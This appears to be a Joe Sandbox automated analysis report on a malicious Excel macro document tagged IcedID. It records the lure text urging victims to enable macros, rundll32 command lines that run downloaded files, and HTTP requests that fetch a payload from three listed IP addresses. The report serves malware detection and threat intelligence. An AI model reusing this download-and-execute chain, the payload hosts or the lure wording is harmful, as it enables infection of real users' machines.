Loading ...

Play interactive tourEdit tour

Analysis Report 91476525608-04012021.xlsm

Overview

General Information

Sample Name:91476525608-04012021.xlsm
Analysis ID:380316
MD5:e8d0244666daf465e9914a7f56938412
SHA1:3c5f71752b0cea18b06dfad9a96cdfeb053f45cc
SHA256:196668480754f95f98c6e59d4776e4f8c756ad3be9fd48a27cfcb50be329567e
Tags:IcedIDxlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 288 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2652 cmdline: rundll32 ..\Hodas.vyur,PluginInit MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2592 cmdline: rundll32 ..\Hodas.vyur1,PluginInit MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2740 cmdline: rundll32 ..\Hodas.vyur2,PluginInit MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\Hodas.vyur,PluginInit, CommandLine: rundll32 ..\Hodas.vyur,PluginInit, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 288, ProcessCommandLine: rundll32 ..\Hodas.vyur,PluginInit, ProcessId: 2652

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://195.123.210.186/44285,5327891204.datAvira URL Cloud: Label: malware
Source: http://91.211.89.28/44285,5327891204.datAvira URL Cloud: Label: malware
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.150.67.243:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.150.67.243:80
Source: Joe Sandbox ViewIP Address: 195.123.210.186 195.123.210.186
Source: global trafficHTTP traffic detected: GET /44285,5327891204.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.150.67.243Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44285,5327891204.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 195.123.210.186Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44285,5327891204.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.211.89.28Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 45.150.67.243
Source: unknownTCP traffic detected without corresponding DNS query: 45.150.67.243
Source: unknownTCP traffic detected without corresponding DNS query: 45.150.67.243
Source: unknownTCP traffic detected without corresponding DNS query: 45.150.67.243
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.89.28
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.89.28
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.89.28
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.89.28
Source: unknownTCP traffic detected without corresponding DNS query: 45.150.67.243
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.89.28
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.89.28
Source: unknownTCP traffic detected without corresponding DNS query: 45.150.67.243
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB206F33.gifJump to behavior
Source: global trafficHTTP traffic detected: GET /44285,5327891204.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.150.67.243Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44285,5327891204.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 195.123.210.186Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44285,5327891204.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.211.89.28Connection: Keep-Alive
Source: rundll32.exe, 00000003.00000002.2108024302.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103871437.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2097651062.0000000001AC0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: rundll32.exe, 00000003.00000002.2108024302.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103871437.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2097651062.0000000001AC0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2108024302.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103871437.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2097651062.0000000001AC0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2108459215.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104076752.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2097854236.0000000001CA7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2108459215.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104076752.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2097854236.0000000001CA7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2108459215.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104076752.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2097854236.0000000001CA7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2108459215.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104076752.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2097854236.0000000001CA7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2108024302.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103871437.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2097651062.0000000001AC0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2108459215.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104076752.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2097854236.0000000001CA7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2108024302.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103871437.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2097651062.0000000001AC0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000005.00000002.2097651062.0000000001AC0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

System Summary:

barindex
Found malicious Excel 4.0 MacroShow sources
Source: 91476525608-04012021.xlsmInitial sample: URLDownloadToFileA
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 8Screenshot OCR: Enable editing button from the yellow bar above 15 0 Once you have enabled editing, please click En
Source: Screenshot number: 8Screenshot OCR: Enable Content button from the yellow bar above 16 17 18 19 20 21 22 ' 23 24 25 26 27 2
Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 0Screenshot OCR: Enable Content button from the yellow bar above
Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 1Screenshot OCR: Enable Content button from the yellow bar above
Source: Screenshot number: 12Screenshot OCR: Enable editing button from the yeljcw bar above 15 0 Once you have enabled editing, please c|icREna
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function Auto_Open, API Microsoft Excel:Application.Run(:Range)
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: 91476525608-04012021.xlsmInitial sample: EXEC
Source: 91476525608-04012021.xlsmInitial sample: EXEC
Source: 91476525608-04012021.xlsmInitial sample: EXEC
Source: 91476525608-04012021.xlsmOLE, VBA macro line: Private Sub Auto_Open()
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function Auto_Open
Source: 91476525608-04012021.xlsmOLE indicator, VBA macros: true
Source: rundll32.exe, 00000003.00000002.2108024302.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103871437.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2097651062.0000000001AC0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal84.expl.evad.winXLSM@7/7@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$91476525608-04012021.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCEF2.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur,PluginInit
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur,PluginInit
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur1,PluginInit
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur2,PluginInit
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur,PluginInit
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur1,PluginInit
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur2,PluginInit
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: 91476525608-04012021.xlsmInitial sample: OLE zip file path = xl/media/image1.gif
Source: 91476525608-04012021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting32Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting32LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://195.123.210.186/44285,5327891204.dat100%Avira URL Cloudmalware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://91.211.89.28/44285,5327891204.dat100%Avira URL Cloudmalware
http://45.150.67.243/44285,5327891204.dat0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://195.123.210.186/44285,5327891204.dattrue
  • Avira URL Cloud: malware
unknown
http://91.211.89.28/44285,5327891204.dattrue
  • Avira URL Cloud: malware
unknown
http://45.150.67.243/44285,5327891204.datfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2108459215.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104076752.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2097854236.0000000001CA7000.00000002.00000001.sdmpfalse
    high
    http://www.windows.com/pctv.rundll32.exe, 00000005.00000002.2097651062.0000000001AC0000.00000002.00000001.sdmpfalse
      high
      http://investor.msn.comrundll32.exe, 00000003.00000002.2108024302.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103871437.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2097651062.0000000001AC0000.00000002.00000001.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2108024302.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103871437.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2097651062.0000000001AC0000.00000002.00000001.sdmpfalse
          high
          http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2108459215.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104076752.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2097854236.0000000001CA7000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2108459215.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104076752.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2097854236.0000000001CA7000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2108024302.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103871437.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2097651062.0000000001AC0000.00000002.00000001.sdmpfalse
            high
            http://investor.msn.com/rundll32.exe, 00000003.00000002.2108024302.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103871437.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2097651062.0000000001AC0000.00000002.00000001.sdmpfalse
              high

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              195.123.210.186
              unknownBulgaria
              50979ITL-LVfalse
              45.150.67.243
              unknownMontenegro
              61317ASDETUKhttpwwwheficedcomGBfalse
              91.211.89.28
              unknownUkraine
              206638HOSTFORYUAfalse

              General Information

              Joe Sandbox Version:31.0.0 Emerald
              Analysis ID:380316
              Start date:01.04.2021
              Start time:21:31:04
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 5m 56s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:91476525608-04012021.xlsm
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
              Number of analysed new started processes analysed:8
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • GSI enabled (VBA)
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal84.expl.evad.winXLSM@7/7@0/3
              EGA Information:Failed
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .xlsm
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Found warning dialog
              • Click Ok
              • Attach to Office via COM
              • Scroll down
              • Close Viewer
              Warnings:
              Show All
              • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              195.123.210.18691399367380-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186/44285,5327891204.dat
              91399367380-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186/44285,5327891204.dat
              91377263701-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186/44285,5327891204.dat
              91399367380-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186/44285,5327891204.dat
              91377263701-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186/44285,5327891204.dat
              91377263701-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186/44285,5327891204.dat
              9792762096-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186/44285,5327891204.dat
              9486635218-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186/44285,5327891204.dat
              9792762096-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186/44285,5327891204.dat
              9792762096-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186/44285,5327891204.dat
              9486635218-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186/44285,5327891204.dat
              9486635218-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186/44285,5327891204.dat
              91193148799-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186/44285,5327891204.dat
              91193148799-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186/44285,5327891204.dat
              91193148799-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186/44285,5327891204.dat
              9924431196-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186/44285,5327891204.dat
              9924431196-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186/44285,5327891204.dat
              9924431196-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186/44285,5327891204.dat

              Domains

              No context

              ASN

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              HOSTFORYUA71608606512-04012021.xlsmGet hashmaliciousBrowse
              • 91.211.91.69
              71608606512-04012021.xlsmGet hashmaliciousBrowse
              • 91.211.91.69
              71608606512-04012021.xlsmGet hashmaliciousBrowse
              • 91.211.91.69
              91399367380-04012021.xlsmGet hashmaliciousBrowse
              • 91.211.89.28
              7225471124-04012021.xlsmGet hashmaliciousBrowse
              • 91.211.91.69
              7275060031-04012021.xlsmGet hashmaliciousBrowse
              • 91.211.91.69
              91399367380-04012021.xlsmGet hashmaliciousBrowse
              • 91.211.89.28
              7225471124-04012021.xlsmGet hashmaliciousBrowse
              • 91.211.91.69
              91377263701-04012021.xlsmGet hashmaliciousBrowse
              • 91.211.89.28
              91399367380-04012021.xlsmGet hashmaliciousBrowse
              • 91.211.89.28
              7275060031-04012021.xlsmGet hashmaliciousBrowse
              • 91.211.91.69
              7225471124-04012021.xlsmGet hashmaliciousBrowse
              • 91.211.91.69
              91377263701-04012021.xlsmGet hashmaliciousBrowse
              • 91.211.89.28
              7275060031-04012021.xlsmGet hashmaliciousBrowse
              • 91.211.91.69
              71911261256-04012021.xlsmGet hashmaliciousBrowse
              • 91.211.91.69
              91377263701-04012021.xlsmGet hashmaliciousBrowse
              • 91.211.89.28
              71911261256-04012021.xlsmGet hashmaliciousBrowse
              • 91.211.91.69
              71911261256-04012021.xlsmGet hashmaliciousBrowse
              • 91.211.91.69
              9792762096-04012021.xlsmGet hashmaliciousBrowse
              • 91.211.89.28
              9486635218-04012021.xlsmGet hashmaliciousBrowse
              • 91.211.89.28
              ITL-LV71608606512-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.248
              71608606512-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.248
              71608606512-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.248
              91399367380-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186
